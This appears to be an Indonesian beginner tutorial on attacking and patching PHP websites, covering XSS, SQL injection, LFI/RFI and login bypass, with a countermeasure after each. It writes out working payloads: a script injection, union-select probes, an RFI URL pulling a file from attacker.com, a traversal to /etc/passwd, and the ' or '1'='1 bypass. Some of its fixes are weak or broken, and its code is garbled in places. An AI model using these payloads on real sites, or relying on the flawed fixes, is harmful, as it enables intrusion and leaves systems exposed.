Assalamualaikum
1. XSS
2. SQLInjection
3. LFI / RFI
4. Bypass Login
1. XSS
http://www.target.com/index.php?
id=560&judul=Rekayasa+Perangkat+Lunak
http://www.target.com/index.php?id=560&judul<script>alert(’Tes
XSS!!!’);</script>
non-breaking space
¢ cent ¢ ¢
£ pound £ £
¥ yen ¥ ¥
€ euro € €
§ section § §
© copyright © ©
® registered trademark ® ®
<?php
echo $judul;
?>
Contohnya dulu.
http://www.target.com/index.php?id=560
Maksud dari url ini untuk menampilkan berita atau artikel atau
apalah yang memiliki id 560 pada tabel dalam database.
contoh :
<?php
include “‘connect.php”;
$id = $_GET['id'];
dan seterusnya….
?>
SQLInjection
Selanjutnya pada query sql yang ada pada script akan berubah
menjadi
Hal ini menyebabkan query error dan menampilkan pesan error nya
pada halaman website.
Selanjutnya kita akan coba cari jumlah record yang ada pada
tabel.
http://www.target.com/index.php?id=560 order by 1
select * from `tblBerita` where `id` = 560 and 1=2 union select
1, 2, 3, 4
PENANGKAL
if (!is_numeric($id))
$id = 0;
3. LFI / RFI
allow_url_include = on
allow_url_fopen = on
magic_quote_gpc = off
Misal
http://www.target.com/index.php?page=news
$page = $_GET['page'];
include($page.”.php”);
Contoh serangan
http://www.target.com/index.php?page=http%3A%2F
%2Fwww.attacker.com%2Ffilejahat.txt?? <– RFI
http://www.target.com/index.php?page=..%2F..%2F..%2F..%2Fetc
%2Fpasswd%00 <– LFI
PENANGKAL
<?php
$page = $_GET['page'];
if ($page == ‘news’)
include(”news.php”);
include(”tutorial.php”);
?>
Next…
4. Bypass Login
user : admin
password : pass123
<?php
include “‘connect.php”;
$user = $_GET['user'];
$pass = $_GET['password'];
dan seterusnya
?>
‘ or ‘1′=’1
user : admin
Ow ow ow, dengan cara ini tanpa sang attacker tau dengan password
adminnya pun dia tetap bisa melakkan login ke system. Sungguh
sangat berbahaya kan.
PENANGKAL
‘ menjadi \’
Contoh
<?php
include “‘connect.php”;
$user = addslashes($_GET['user']);
$pass = addslashes($_GET['password']);
dan seterusnya
?>
PENANGKAL
<?php
?>
FINISH